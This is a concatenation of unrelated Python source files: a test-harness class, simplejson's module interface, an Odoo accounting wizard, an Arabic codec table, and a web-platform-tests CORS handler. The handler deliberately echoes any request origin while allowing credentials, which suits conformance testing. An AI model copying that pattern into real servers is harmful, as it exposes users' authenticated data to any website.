universal_newlines = self.universal_newlines
# On Windows, if we make stdin a pipe when we plan to send
# no input, and the test program exits before
# Popen calls msvcrt.open_osfhandle, that call will fail.
# So don't use a pipe for stdin if we don't need one.
stdin = kw.get('stdin', None)
if stdin is not None:
stdin = subprocess.PIPE
combine = kw.get('combine', self.combine)
if combine:
stderr_value = subprocess.STDOUT
else:
stderr_value = subprocess.PIPE
return Popen(cmd,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=stderr_value,
universal_newlines=universal_newlines)
def finish(self, popen, **kw):
"""
Finishes and waits for the process being run under control of
the specified popen argument, recording the exit status,
standard output and error output.
"""
popen.stdin.close()
self.status = popen.wait()
if not self.status:
self.status = 0
self._stdout.append(popen.stdout.read())
if popen.stderr:
stderr = popen.stderr.read()
else:
stderr = ''
self._stderr.append(stderr)
def run(self, program = None,
interpreter = None,
arguments = None,
chdir = None,
stdin = None,
universal_newlines = None):
"""Runs a test of the program or script for the test
environment. Standard output and error output are saved for
future retrieval via the stdout() and stderr() methods.
The specified program will have the original directory
prepended unless it is enclosed in a [list].
"""
if chdir:
oldcwd = os.getcwd()
if not os.path.isabs(chdir):
chdir = os.path.join(self.workpath(chdir))
if self.verbose:
sys.stderr.write("chdir(" + chdir + ")\n")
os.chdir(chdir)
p = self.start(program,
interpreter,
arguments,
universal_newlines,
stdin=stdin)
if stdin:
if is_List(stdin):
for line in stdin:
p.stdin.write(line)
else:
p.stdin.write(stdin)
p.stdin.close()
out = p.stdout.read()
if p.stderr is None:
err = ''
else:
err = p.stderr.read()
try:
close_output = p.close_output
except AttributeError:
p.stdout.close()
if not p.stderr is None:
p.stderr.close()
else:
close_output()
self._stdout.append(out)
self._stderr.append(err)
self.status = p.wait()
if not self.status:
self.status = 0
if chdir:
os.chdir(oldcwd)
if self.verbose >= 2:
write = sys.stdout.write
write('============ STATUS: %d\n' % self.status)
out = self.stdout()
if out or self.verbose >= 3:
write('============ BEGIN STDOUT (len=%d):\n' % len(out))
write(out)
write('============ END STDOUT\n')
err = self.stderr()
if err or self.verbose >= 3:
write('============ BEGIN STDERR (len=%d)\n' % len(err))
write(err)
write('============ END STDERR\n')
def sleep(self, seconds = default_sleep_seconds):
"""Sleeps at least the specified number of seconds. If no
number is specified, sleeps at least the minimum number of
seconds necessary to advance file time stamps on the current
system. Sleeping more seconds is all right.
"""
time.sleep(seconds)
def stderr(self, run = None):
"""Returns the error output from the specified run number.
If there is no specified run number, then returns the error
output of the last run. If the run number is less than zero,
then returns the error output from that many runs back from the
current run.
"""
if not run:
run = len(self._stderr)
elif run < 0:
run = len(self._stderr) + run
run = run - 1
return self._stderr[run]
def stdout(self, run = None):
"""Returns the standard output from the specified run number.
If there is no specified run number, then returns the standard
output of the last run. If the run number is less than zero,
then returns the standard output from that many runs back from
the current run.
"""
if not run:
run = len(self._stdout)
elif run < 0:
run = len(self._stdout) + run
run = run - 1
return self._stdout[run]
def subdir(self, *subdirs):
"""Create new subdirectories under the temporary working
directory, one for each argument. An argument may be a list,
in which case the list elements are concatenated using the
os.path.join() method. Subdirectories multiple levels deep
must be created using a separate argument for each level:
test.subdir('sub', ['sub', 'dir'], ['sub', 'dir', 'ectory'])
Returns the number of subdirectories actually created.
"""
count = 0
for sub in subdirs:
if sub is None:
continue
if is_List(sub):
sub = apply(os.path.join, tuple(sub))
new = os.path.join(self.workdir, sub)
try:
os.mkdir(new)
except OSError:
pass
else:
count = count + 1
return count
def symlink(self, target, link):
"""Creates a symlink to the specified target.
The link name may be a list, in which case the elements are
concatenated with the os.path.join() method. The link is
assumed to be under the temporary working directory unless it
is an absolute path name. The target is *not* assumed to be
under the temporary working directory.
"""
link = self.canonicalize(link)
os.symlink(target, link)
def tempdir(self, path=None):
"""Creates a temporary directory.
A unique directory name is generated if no path name is specified.
The directory is created, and will be removed when the TestCmd
object is destroyed.
"""
if path is None:
try:
path = tempfile.mktemp(prefix=tempfile.template)
except TypeError:
path = tempfile.mktemp()
os.mkdir(path)
# Symlinks in the path will report things
# differently from os.getcwd(), so chdir there
# and back to fetch the canonical path.
cwd = os.getcwd()
try:
os.chdir(path)
path = os.getcwd()
finally:
os.chdir(cwd)
# Uppercase the drive letter since the case of drive
# letters is pretty much random on win32:
drive,rest = os.path.splitdrive(path)
if drive:
path = string.upper(drive) + rest
#
self._dirlist.append(path)
global _Cleanup
try:
_Cleanup.index(self)
except ValueError:
_Cleanup.append(self)
return path
def touch(self, path, mtime=None):
"""Updates the modification time on the specified file or
directory path name. The default is to update to the
current time if no explicit modification time is specified.
"""
path = self.canonicalize(path)
atime = os.path.getatime(path)
if mtime is None:
mtime = time.time()
os.utime(path, (atime, mtime))
def unlink(self, file):
"""Unlinks the specified file name.
The file name may be a list, in which case the elements are
concatenated with the os.path.join() method. The file is
assumed to be under the temporary working directory unless it
is an absolute path name.
"""
file = self.canonicalize(file)
os.unlink(file)
def verbose_set(self, verbose):
"""Set the verbose level.
"""
self.verbose = verbose
def where_is(self, file, path=None, pathext=None):
"""Find an executable file.
"""
if is_List(file):
file = apply(os.path.join, tuple(file))
if not os.path.isabs(file):
file = where_is(file, path, pathext)
return file
def workdir_set(self, path):
"""Creates a temporary working directory with the specified
path name. If the path is a null string (''), a unique
directory name is created.
"""
if (path != None):
if path == '':
path = None
path = self.tempdir(path)
self.workdir = path
def workpath(self, *args):
"""Returns the absolute path name to a subdirectory or file
within the current temporary working directory. Concatenates
the temporary working directory name with the specified
arguments using the os.path.join() method.
"""
return apply(os.path.join, (self.workdir,) + tuple(args))
def readable(self, top, read=1):
"""Make the specified directory tree readable (read == 1)
or not (read == None).
This method has no effect on Windows systems, which use a
completely different mechanism to control file readability.
"""
if sys.platform == 'win32':
return
if read:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]|stat.S_IREAD))
else:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]&~stat.S_IREAD))
if os.path.isfile(top):
# If it's a file, that's easy, just chmod it.
do_chmod(top)
elif read:
# It's a directory and we're trying to turn on read
# permission, so it's also pretty easy, just chmod the
# directory and then chmod every entry on our walk down the
# tree. Because os.path.walk() is top-down, we'll enable
# read permission on any directories that have it disabled
# before os.path.walk() tries to list their contents.
do_chmod(top)
def chmod_entries(arg, dirname, names, do_chmod=do_chmod):
for n in names:
do_chmod(os.path.join(dirname, n))
os.path.walk(top, chmod_entries, None)
else:
# It's a directory and we're trying to turn off read
            # permission, which means we have to chmod the directories
# in the tree bottom-up, lest disabling read permission from
# the top down get in the way of being able to get at lower
# parts of the tree. But os.path.walk() visits things top
# down, so we just use an object to collect a list of all
# of the entries in the tree, reverse the list, and then
# chmod the reversed (bottom-up) list.
col = Collector(top)
os.path.walk(top, col, None)
col.entries.reverse()
for d in col.entries: do_chmod(d)
def writable(self, top, write=1):
"""Make the specified directory tree writable (write == 1)
or not (write == None).
"""
if sys.platform == 'win32':
if write:
def do_chmod(fname):
try: os.chmod(fname, stat.S_IWRITE)
except OSError: pass
else:
def do_chmod(fname):
try: os.chmod(fname, stat.S_IREAD)
except OSError: pass
else:
if write:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]|0200))
else:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]&~0200))
if os.path.isfile(top):
do_chmod(top)
else:
col = Collector(top)
os.path.walk(top, col, None)
for d in col.entries: do_chmod(d)
def executable(self, top, execute=1):
"""Make the specified directory tree executable (execute == 1)
or not (execute == None).
This method has no effect on Windows systems, which use a
completely different mechanism to control file executability.
"""
if sys.platform == 'win32':
return
if execute:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]|stat.S_IEXEC))
else:
def do_chmod(fname):
try: st = os.stat(fname)
except OSError: pass
else: os.chmod(fname, stat.S_IMODE(st[stat.ST_MODE]&~stat.S_IEXEC))
if os.path.isfile(top):
# If it's a file, that's easy, just chmod it.
do_chmod(top)
elif execute:
# It's a directory and we're trying to turn on execute
# permission, so it's also pretty easy, just chmod the
# directory and then chmod every entry on our walk down the
# tree. Because os.path.walk() is top-down, we'll enable
# execute permission on any directories that have it disabled
# before os.path.walk() tries to list their contents.
do_chmod(top)
def chmod_entries(arg, dirname, names, do_chmod=do_chmod):
for n in names:
do_chmod(os.path.join(dirname, n))
os.path.walk(top, chmod_entries, None)
else:
# It's a directory and we're trying to turn off execute
# permission, which means we have to chmod the directories
# in the tree bottom-up, lest disabling execute permission from
# the top down get in the way of being able to get at lower
# parts of the tree. But os.path.walk() visits things top
# down, so we just use an object to collect a list of all
# of the entries in the tree, reverse the list, and then
# chmod the reversed (bottom-up) list.
col = Collector(top)
os.path.walk(top, col, None)
col.entries.reverse()
for d in col.entries: do_chmod(d)
def write(self, file, content, mode = 'wb'):
"""Writes the specified content text (second argument) to the
specified file name (first argument). The file name may be
a list, in which case the elements are concatenated with the
os.path.join() method. The file is created under the temporary
working directory. Any subdirectories in the path must already
exist. The I/O mode for the file may be specified; it must
begin with a 'w'. The default is 'wb' (binary write).
"""
file = self.canonicalize(file)
if mode[0] != 'w':
raise ValueError, "mode must begin with 'w'"
with open(file, mode) as f:
f.write(content)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
barbarubra/Don-t-know-What-i-m-doing. | refs/heads/master | python-build/python-libs/python-twitter/simplejson/__init__.py | 136 | r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> s = json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=4)
>>> print '\n'.join([l.rstrip() for l in s.splitlines()])
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> import decimal
>>> json.loads('1.1', parse_float=decimal.Decimal) == decimal.Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
    ...     raise TypeError("%r is not JSON serializable" % (obj,))
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -msimplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -msimplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
__version__ = '2.0.7'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONEncoder',
]
from decoder import JSONDecoder
from encoder import JSONEncoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is ``True`` then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
    If ``ensure_ascii`` is ``False``, then some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If ``check_circular`` is ``False``, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is ``False``, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
    in strict compliance with the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and object
members will be pretty-printed with that indent level. An indent level
of 0 will only insert newlines. ``None`` is the most compact representation.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (skipkeys is False and ensure_ascii is True and
check_circular is True and allow_nan is True and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, **kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
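# Editor's note: a minimal, hedged usage sketch for ``dump`` above (it uses
# only the documented behaviour; ``StringIO`` stands in for any
# ``.write()``-supporting object):
#
#     >>> from StringIO import StringIO
#     >>> io = StringIO()
#     >>> dump({'a': 1}, io)
#     >>> io.getvalue()
#     '{"a": 1}'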
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is ``True`` then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is ``False``, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is ``False``, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is ``False``, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
    strict compliance with the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (skipkeys is False and ensure_ascii is True and
check_circular is True and allow_nan is True and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
**kw).encode(obj)
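# Editor's note: a short illustrative sketch of how the ``separators`` and
# ``indent`` arguments documented above affect ``dumps`` output (plain
# defaults are assumed for everything else):
#
#     >>> dumps([1, 2, {'3': 4}], separators=(',', ':'))
#     '[1,2,{"3":4}]'
#     >>> print dumps({'3': 4}, indent=2)
#     {
#       "3": 4
#     }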
_default_decoder = JSONDecoder(encoding=None, object_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, **kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
    If the contents of ``fp`` are encoded with an ASCII based encoding other
    than utf-8 (e.g. latin-1), then an appropriate ``encoding`` name must
    be specified. Encodings that are not ASCII based (such as UCS-2) are
    not allowed; such a stream should instead be wrapped with
    ``codecs.getreader(encoding)(fp)``, or simply decoded to a ``unicode``
    object and passed to ``loads()``.
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
If ``s`` is a ``str`` instance and is encoded with an ASCII based encoding
other than utf-8 (e.g. latin-1) then an appropriate ``encoding`` name
must be specified. Encodings that are not ASCII based (such as UCS-2)
are not allowed and should be decoded to ``unicode`` first.
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN, null, true, false.
This can be used to raise an exception if invalid JSON numbers
are encountered.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
return cls(encoding=encoding, **kw).decode(s)
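# Editor's note: a hedged sketch of the ``parse_int`` and ``object_hook``
# hooks documented above (both examples use only the standard library):
#
#     >>> loads('[1, 2, 3]', parse_int=float)
#     [1.0, 2.0, 3.0]
#     >>> loads('{"x": 1, "y": 2}', object_hook=lambda d: sorted(d.keys()))
#     [u'x', u'y']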
|
mmatyas/servo | refs/heads/master | tests/wpt/web-platform-tests/XMLHttpRequest/resources/auth2/corsenabled.py | 367 | import imp
import os
def main(request, response):
response.headers.set('Access-Control-Allow-Origin', request.headers.get("origin"));
response.headers.set('Access-Control-Allow-Credentials', 'true');
response.headers.set('Access-Control-Allow-Methods', 'GET');
response.headers.set('Access-Control-Allow-Headers', 'authorization, x-user, x-pass');
response.headers.set('Access-Control-Expose-Headers', 'x-challenge, xhr-user, ses-user');
auth = imp.load_source("", os.path.join(os.path.abspath(os.curdir),
"XMLHttpRequest",
"resources",
"authentication.py"))
if request.method == "OPTIONS":
return ""
else:
return auth.main(request, response)
|
minhtuancn/odoo | refs/heads/8.0 | addons/account/wizard/account_state_open.py | 341 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class account_state_open(osv.osv_memory):
_name = 'account.state.open'
_description = 'Account State Open'
def change_inv_state(self, cr, uid, ids, context=None):
proxy = self.pool.get('account.invoice')
if context is None:
context = {}
active_ids = context.get('active_ids')
if isinstance(active_ids, list):
invoice = proxy.browse(cr, uid, active_ids[0], context=context)
if invoice.reconciled:
raise osv.except_osv(_('Warning!'), _('Invoice is already reconciled.'))
invoice.signal_workflow('open_test')
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
olemis/brython | refs/heads/master | www/src/Lib/encodings/iso8859_6.py | 37 | """ Python Character Mapping Codec iso8859_6 generated from 'MAPPINGS/ISO8859/8859-6.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-6',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
